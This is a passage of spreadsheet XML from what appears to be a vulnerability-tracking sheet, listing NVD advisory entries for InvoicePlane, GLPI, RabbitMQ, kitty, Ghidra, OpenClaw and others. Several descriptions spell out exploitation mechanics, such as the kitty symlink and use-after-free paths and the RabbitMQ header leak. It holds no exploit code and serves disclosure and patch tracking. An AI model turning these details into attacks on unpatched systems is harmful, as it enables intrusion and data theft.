      <c r="E389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F389" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G389" s="5" t="inlineStr"/>
      <c r="H389" s="5" t="inlineStr"/>
      <c r="I389" s="5" t="inlineStr"/>
      <c r="J389" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K389" s="5" t="inlineStr"/>
      <c r="L389" s="5" t="inlineStr"/>
      <c r="M389" s="5" t="inlineStr"/>
      <c r="N389" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O389" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P389" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q389" s="5" t="inlineStr"/>
      <c r="R389" s="5" t="inlineStr">
        <is>
          <t>CWE-697</t>
        </is>
      </c>
      <c r="S389" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2, InvoicePlane's User_Controller compares the session user_type value with the required role by using PHP's loose inequality operator. Under a non-standard session backend that returns unexpected scalar types, type juggling can cause a value that is not strictly the required role to pass the authorization check. This can permit authentication or authorization bypass in affected session configurations. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85292</t>
        </is>
      </c>
    </row>
    <row r="390">
      <c r="A390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B390" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85293</t>
        </is>
      </c>
      <c r="D390" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F390" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G390" s="5" t="inlineStr"/>
      <c r="H390" s="5" t="inlineStr"/>
      <c r="I390" s="5" t="inlineStr"/>
      <c r="J390" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K390" s="5" t="inlineStr"/>
      <c r="L390" s="5" t="inlineStr"/>
      <c r="M390" s="5" t="inlineStr"/>
      <c r="N390" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O390" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P390" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q390" s="5" t="inlineStr"/>
      <c r="R390" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-87</t>
        </is>
      </c>
      <c r="S390" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2-beta-1, InvoicePlane stores client_email values without enforcing email syntax and renders them unescaped inside double-quoted value attributes in the invoice mailer form and quote mailer form. An administrator who can edit a client can store attribute-breaking input, and, when the mailer is configured, JavaScript executes when another authenticated administrator opens the related mailer page. The script runs in the InvoicePlane origin and can perform same-origin actions with the victim's session. This issue is fixed in version 1.7.2.</t>
        </is>
      </c>
      <c r="T390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85293</t>
        </is>
      </c>
    </row>
    <row r="391">
      <c r="A391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B391" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49469</t>
        </is>
      </c>
      <c r="D391" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F391" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G391" s="5" t="inlineStr"/>
      <c r="H391" s="5" t="inlineStr"/>
      <c r="I391" s="5" t="inlineStr"/>
      <c r="J391" s="5" t="inlineStr"/>
      <c r="K391" s="5" t="inlineStr"/>
      <c r="L391" s="5" t="inlineStr"/>
      <c r="M391" s="5" t="inlineStr"/>
      <c r="N391" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O391" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P391" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q391" s="5" t="inlineStr"/>
      <c r="R391" s="5" t="inlineStr">
        <is>
          <t>CWE-90</t>
        </is>
      </c>
      <c r="S391" s="5" t="inlineStr">
        <is>
          <t>GLPI is a free asset and IT management software package. From 0.70 until 10.0.26 and 11.0.8, an authenticated hotliner or technician can submit crafted criteria through the user import feature to bypass the configured default LDAP filter. This allows access to LDAP objects that the default filter was intended to exclude. This issue is fixed in versions 11.0.8 and 10.0.26.</t>
        </is>
      </c>
      <c r="T391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49469</t>
        </is>
      </c>
    </row>
    <row r="392">
      <c r="A392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B392" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67406</t>
        </is>
      </c>
      <c r="D392" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F392" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G392" s="5" t="inlineStr"/>
      <c r="H392" s="5" t="inlineStr"/>
      <c r="I392" s="5" t="inlineStr"/>
      <c r="J392" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K392" s="5" t="inlineStr"/>
      <c r="L392" s="5" t="inlineStr"/>
      <c r="M392" s="5" t="inlineStr"/>
      <c r="N392" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O392" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P392" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q392" s="5" t="inlineStr"/>
      <c r="R392" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S392" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.0.0 until 4.3.3, 4.2.9, 4.1.14, and 4.0.23, Shovel does not format state logged by the crash reporter and can leave unencrypted credentials in a crash dump file. the shovel worker genserver processes does not implement the formatstatus/2 callback. When these processes crash (e.g., due to network partitions, connection failures), the OTP SASL error handler writes the full process state , including plaintext AMQP passwords and URIs , to the error log. This is particularly severe for the shovel worker, which stores deobfuscated plaintext URIs (including amqp://user:password@host format) in its genserver state for the entire process Automatic Credential Exposure: Shovel worker crashes (common during network partitions) automatically write plaintext upstream/downstream passwords to error logs No Special Configuration Needed: Unlike DEBUG logging, SASL error reports are always active Broad. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, and 4.0.23.</t>
        </is>
      </c>
      <c r="T392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67406</t>
        </is>
      </c>
    </row>
    <row r="393">
      <c r="A393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B393" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80430</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="inlineStr"/>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr"/>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q393" s="5" t="inlineStr"/>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S393" s="5" t="inlineStr">
        <is>
          <t>Improper Link Resolution Before File Access in the drag source staging path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to create files and directories at paths outside the staging directory, because subdir_data_for_drag() in kitty/dnd.c resolves a descendant of the staged item tree by constructing a path string and opening it with safe_open(path, O_DIRECTORY | O_RDONLY, 0) rather than by walking the tree one component at a time, so a client that declares two entries with the same name, the first a symlink whose target is an arbitrary absolute path and the second a directory, causes mkdirat() to fail with EEXIST, which the code ignores, and causes the subsequent path resolution to follow the symlink and return a directory descriptor outside the staging directory, which is then passed as the dirfd argument to add_payload() and used for every further create operation on that item and its descendants. Entry names are sanitised against path separators and dot components, but symlink targets are not validated. Files are created with O_CREAT | O_WRONLY | O_EXCL at mode 0644, so existing files cannot be overwritten, and directories are created with mkdirat() at mode 0755, so the attacker can create intermediate directories that did not previously exist. This results in the creation of files and directories at any path writable by the user running kitty, provided the symlink target is an existing directory.</t>
        </is>
      </c>
      <c r="T393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80430</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95834</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="inlineStr"/>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr"/>
      <c r="K394" s="5" t="inlineStr"/>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q394" s="5" t="inlineStr"/>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S394" s="5" t="inlineStr">
        <is>
          <t>Use After Free in the drag source path of the drag and drop protocol in kitty from 0.47.0 before 0.49.0 allows a program writing to the terminal to cause the terminal to read from and write to freed heap memory, because drag_remote_file_data() in kitty/dnd.c holds a DragRemoteItem pointer into an array it does not own, calls toplevel_data_for_drag() or subdir_data_for_drag(), and then continues to use that pointer. Those helpers, and add_payload() and populate_dir_entries() which they call, report errors through the abrt() macro, which expands to cancel_drag() followed by a plain return, and cancel_drag() calls drag_free_offer(), which frees the array the pointer refers to. The helpers return void, so the caller receives no indication that the teardown happened, and proceeds to call all_children_complete() on the freed pointer, which dereferences it, and then to write through it. That dereference is guarded by a local flag that is set when the request carries no payload and announces no further data, which is the same condition that selects the finalisation block of add_payload(), so the error paths in that block reach it: a create that fails because an entry of the same name already exists, because the client may declare two entries with one name and the create operations use O_CREAT with O_EXCL and symlinkat(), a mkdirat() failure other than EEXIST, and the directory entry allocation paths. Both branches reach it. In the top level branch the caller's pointer is never cleared, so clearing the owning structure's own pointers during teardown does not help. In the sub directory branch subdir_data_for_drag() sets the caller's pointer to NULL on entry and assigns it only after its own last error path, so its own aborts leave the caller with NULL and are stopped by a null check, but it then calls add_payload() with that pointer set, and an abort there leaves the caller holding a freed child node inside the item tree, which drag_free_offer() frees by recursion. This results in undefined behaviour in the terminal process, reachable from the byte stream of any program running in the window.</t>
        </is>
      </c>
      <c r="T394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95834</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67421</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>4.5</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="inlineStr"/>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr"/>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q395" s="5" t="inlineStr"/>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S395" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5, RabbitMQ Management rendered an AMQP authorization-error reason containing an attacker-controlled queue name as HTML when the OAuth management UI was enabled. Exploitation requires an attacker with queue configure permission, a management administrator who can see but cannot read that queue, and the administrator clicking Get Message(s). A queue name containing a base element can then retarget the automatic relative refresh because the Content Security Policy omits base-uri and connect-src, and an attacker endpoint that permits the management origin through CORS can receive the victim's Authorization header. This issue is fixed in versions 3.13.19, 4.0.24, 4.1.15, 4.2.10, and 4.3.5.</t>
        </is>
      </c>
      <c r="T395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67421</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100505</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="inlineStr"/>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr"/>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q396" s="5" t="inlineStr"/>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S396" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions 11.2 through 12.1.4 contain a heap out-of-bounds read vulnerability in StringManager::getCodepoint when decoding multi-byte UTF-8, UTF-16, or UTF-32 characters without validating remaining buffer length. Attackers can craft malicious binaries with constant byte stores ending in multi-byte lead units to trigger out-of-bounds reads that crash the decompiler or leak adjacent heap memory into decompiled output.</t>
        </is>
      </c>
      <c r="T396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100505</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100305</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="inlineStr"/>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr"/>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q397" s="5" t="inlineStr"/>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S397" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 fails to enforce form fill-in restrictions on the authenticated submission endpoint POST /user/form/data/create. Authenticated attackers who know a form's key can submit unlimited entries to any form, bypassing publish status, time window, quota, and per-IP restrictions to falsify collected results.</t>
        </is>
      </c>
      <c r="T397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100305</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100525</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="inlineStr"/>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q398" s="5" t="inlineStr"/>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S398" s="5" t="inlineStr">
        <is>
          <t>The OpenClaw Prometheus diagnostics plugin (@openclaw/diagnostics-prometheus) before version 2026.9.3 does not enforce the operator.read scope on its authenticated metrics endpoint. In deployments using an identity-bearing Gateway authentication mode such as trusted-proxy, a caller whose effective role has no read scope can retrieve the diagnostics document even though ordinary read methods reject the same identity, disclosing operational metrics to an authenticated profile intentionally limited below read access. Shared-secret Gateway callers already hold the documented full operator scope and are not affected. The issue is fixed in 2026.9.3; as a workaround, disable the Prometheus endpoint or ensure every identity that can reach it is intended to hold operator.read.</t>
        </is>
      </c>
      <c r="T398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100525</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100553</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="inlineStr"/>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q399" s="5" t="inlineStr"/>
      <c r="R399" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S399" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions &gt;= 2026.6.9 and &lt; 2026.8.1 do not declare the native chatId parameter as a delivery target in the Feishu unpin feature, so unpin requests can bypass the shared same-provider cross-context target check. When tools.message.crossContext.allowWithinProvider is disabled, an admitted (authenticated) sender can remove a pin from another Feishu group that the sender and the configured account are otherwise permitted to access, bypassing the intended cross-context message mutation policy. Feishu membership and group authorization still apply, and the demonstrated impact is limited to message mutation (pin removal). The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100553</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100583</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="inlineStr"/>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr"/>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q400" s="5" t="inlineStr"/>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S400" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Discord versions before 2026.7.1 contain an authorization bypass vulnerability in guild metadata read actions that allows lower-trust senders to retrieve information excluded by channel allowlists. Attackers can bypass the configured Discord read-target policy to access guild metadata from servers or channels outside the operator's allowlist.</t>
        </is>
      </c>
      <c r="T400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100583</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100590</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="inlineStr"/>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr"/>
      <c r="K401" s="5" t="inlineStr"/>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q401" s="5" t="inlineStr"/>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S401" s="5" t="inlineStr">
        <is>
          <t>OpenClaw before 2026.7.1 contains an authorization bypass vulnerability in the /voice set command that allows non-owner external-channel senders to persist Gateway voice configuration. Attackers with command access can change the voice used by Talk responses for the configured provider, affecting configuration integrity without exposing credentials or granting additional host capabilities.</t>
        </is>
      </c>
      <c r="T401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100590</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19775</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q402" s="5" t="inlineStr"/>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S402" s="5" t="inlineStr">
        <is>
          <t>The OpenStation — Desktop Windows, Dock &amp; Virtual Desktops for WP Admin plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with custom-level access and above, to read the title, status, date, permalink, and a 300-character content excerpt of any private, draft, pending, or future post, as well as the content and AI-moderation verdicts of unapproved and spam comments. Any authenticated user with the 'read' capability can self-enable the required AI feature by visiting the /openstation/ portal and toggling their own ai.enabled setting via the POST /desktop-mode/v1/os-settings endpoint, removing any practical barrier to exploitation.</t>
        </is>
      </c>
      <c r="T402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19775</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6103</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
